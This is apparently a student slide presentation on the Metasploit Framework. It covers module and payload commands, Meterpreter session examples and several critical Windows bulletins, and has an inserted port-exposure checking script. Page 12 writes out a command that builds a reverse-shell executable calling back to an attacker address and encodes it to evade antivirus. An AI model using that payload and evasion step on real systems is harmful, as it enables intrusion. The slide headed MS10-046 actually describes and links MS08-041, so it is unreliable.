Metasploit Framework


Upload: le-quyen

Post on 13-May-2015


Page 1

Metasploit Framework

Lê Đức Quyền 08130075, Cao Ngô Nhật Thanh 08130081

Page 2

What is Metasploit?

• “The Metasploit Framework is an advanced open-source platform for attacking, testing, and using exploit code.”
• Metasploit software helps security and IT professionals identify security issues and verify vulnerabilities in systems.
• Perform penetration tests:
  – Overt penetration testing
  – Covert penetration testing
• Consists of tools, libraries, modules, and user interfaces. These are configured and combined to launch an exploit.
• Written in Ruby.

Page 3

Motivation

• Professional approach to penetration testing:
  – Automation
  – Reconnaissance, exploitation
• All-in-one solution:
  – Multi-platform
  – Diverse range of target applications
• Open source:
  – Custom payloads

Page 4

Metasploit Architecture

Page 5

Metasploit Framework commands

• Choose an exploit module:
  – show exploits: list the exploits available within the framework
  – use exploit_name: select the exploit
  – info exploit_name: view information about the exploit
• Choose a payload:
  – show payloads: show only the payloads that are compatible with the chosen module
  – info payload_name: view detailed information about the payload
  – set payload payload_name: select the payload

Page 6

Metasploit Framework commands (continued)

• Configure the chosen payload:
  – show options: view the options that must be configured
  – set option_name value: configure an option
  – show advanced: show the advanced options
  – check: verify that the options are configured correctly
  – show targets: list the potentially vulnerable targets
  – set TARGET value: select the target
  – exploit: launch the exploit and attempt to attack the target

Page 7

Meterpreter

Meterpreter, short for The Meta-Interpreter, is an advanced payload that is included in the Metasploit Framework. Its purpose is to provide complex commands for exploiting and attacking a remote machine. It accomplishes this by allowing developers to write their own extensions in the form of shared object (DLL) files that can be uploaded and injected into a running process on a target computer after exploitation has occurred.

Page 8

Meterpreter payload

• Fs: provides interaction with the filesystem on the remote machine.
• Net: provides interaction with the network stack on the remote machine.
• Process: provides interaction with processes on the remote machine.
• Sys: provides interaction with the environment on the remote machine.

Page 9

Basic Meterpreter commands

• screenshot: capture the desktop screen of the victim
• sysinfo: view information about the victim's platform:

    meterpreter > sysinfo
    Computer: IHAZSECURITY
    OS      : Windows XP (Build 2600, Service Pack 2).
    Arch    : x86
    Language: en_US

Page 10

Basic Meterpreter commands

• execute: executes a process on the remote endpoint
• kill: terminate one or more processes on the remote endpoint
• ps: list processes on the remote endpoint

Page 11

Basic Meterpreter commands

    meterpreter > execute -f cmd -c
    execute: success, process id is 3516.
    execute: allocated channel 1 for new process.
    meterpreter > interact 1
    interact: Switching to interactive console on 1...
    interact: Started interactive channel 1.

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS>ipconfig

Page 12

Avoiding detection

• Encoding the payload with msfencode:

    root@bt:/# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -t exe > /var/www/payload2.exe

• Multi-encoding: allows the payload to be encoded several times to throw off antivirus programs.

Page 13

Critical vulnerabilities

Page 14

MS08-067 - Critical

• Vulnerability in Server Service Could Allow Remote Code Execution (958644)
• The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code.
• Firewall best practices and standard default firewall configurations can help protect network resources from attacks that originate outside the enterprise perimeter.
• http://technet.microsoft.com/en-us/security/bulletin/ms08-067

Page 15

MS04-011 - Critical

LSASS Vulnerability - CAN-2003-0533

Impact of vulnerability: Remote Code Execution

An attacker who successfully exploited the most severe of these vulnerabilities could take complete control of an affected system, including installing programs; viewing, changing, or deleting data; or creating new accounts that have full privileges.

This vulnerability is caused by an unchecked buffer in the LSASS service.

http://technet.microsoft.com/en-us/security/bulletin/ms04-011

Page 16

MS10-061 - Critical

• This is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts.
• Systems are only vulnerable to remote attack when sharing a printer and the remote attacker can access the printer share.
• This vulnerability is caused when the Windows Print Spooler insufficiently restricts user permissions to access print spoolers.
• Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.
• http://technet.microsoft.com/en-us/security/bulletin/MS10-061

Page 17

MS03-026 - Critical

• This vulnerability is caused by the Windows RPCSS service not properly checking message inputs under certain circumstances. After establishing a connection, an attacker could send a specially crafted malformed RPC message to cause the underlying Distributed Component Object Model (DCOM) process on the remote system to fail in such a way that arbitrary code could be executed.
• To exploit this vulnerability, the attacker would require the ability to send a specially crafted request to port 135, 139, 445 or 593 or any other specifically configured RPC port on the remote machine.
• Best practices recommend blocking all TCP/IP ports that are not actually being used.
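The mitigation the slides give for MS03-026 and MS10-061 is to expose as few ports as possible; the concrete check behind that advice is whether a host actually listens on the RPC/SMB ports named above on anything other than loopback. This added example (not from the slides or from Metasploit) parses Windows `netstat -an` style output, using a constructed sample, and maps off-host listeners back to the bulletins discussed. The port set for MS03-026 is the one the slide lists; tying the other three bulletins to the SMB ports 139 and 445 is this example's own assumption.

```python
import re
from collections import defaultdict

# MS03-026 ports come from the slide; the SMB ports for the other bulletins are an
# assumption of this example (Server service, LSASS and the printer share are reached over SMB).
BULLETIN_PORTS = {
    "MS03-026 RPCSS/DCOM": {135, 139, 445, 593},
    "MS08-067 Server service": {139, 445},
    "MS04-011 LSASS": {139, 445},
    "MS10-061 Print Spooler share": {139, 445},
}

# One line of Windows `netstat -an` output: proto, local addr:port, foreign addr, optional state.
LISTEN_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<addr>\[[^\]]+\]|[\d.]+):(?P<port>\d+)\s+\S+(?:\s+(?P<state>\w+))?"
)

def exposure(addr: str) -> str:
    """Classify a bind address as loopback, all-interfaces, or a specific interface."""
    a = addr.strip("[]")
    return "loopback" if a in ("127.0.0.1", "::1") else "all-interfaces" if a in ("0.0.0.0", "::") else "interface"

def exposed_listeners(netstat_output: str) -> dict:
    """Return {bulletin: [(port, exposure), ...]} for TCP listeners reachable from off-host."""
    findings = defaultdict(list)
    for line in netstat_output.splitlines():
        m = LISTEN_RE.match(line)
        # Only TCP listeners count; loopback-bound sockets are not reachable from the network.
        if not m or m["proto"] != "TCP" or m["state"] != "LISTENING":
            continue
        port, where = int(m["port"]), exposure(m["addr"])
        if where == "loopback":
            continue
        for bulletin, ports in BULLETIN_PORTS.items():
            if port in ports:
                findings[bulletin].append((port, where))
    return dict(findings)

# Constructed sample of `netstat -an` output; not captured from a real host.
SAMPLE_NETSTAT = """\
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    127.0.0.1:593          0.0.0.0:0              LISTENING
  TCP    192.168.1.10:139       0.0.0.0:0              LISTENING
  TCP    192.168.1.10:445       192.168.1.101:4444     ESTABLISHED
  UDP    0.0.0.0:445            *:*
"""

if __name__ == "__main__":
    print(exposed_listeners(SAMPLE_NETSTAT))
```

An exposed port is a reachability finding, not proof the host is unpatched; pair it with the bulletin's patch state before treating it as a vulnerability.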

Page 18

MS10-046 - Critical

• A remote code execution vulnerability exists in the ActiveX control for the Snapshot Viewer for Microsoft Access. An attacker could exploit the vulnerability by constructing a specially crafted Web page. When a user views the Web page, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user.
• http://technet.microsoft.com/en-us/security/bulletin/MS08-041

Page 19

DEMO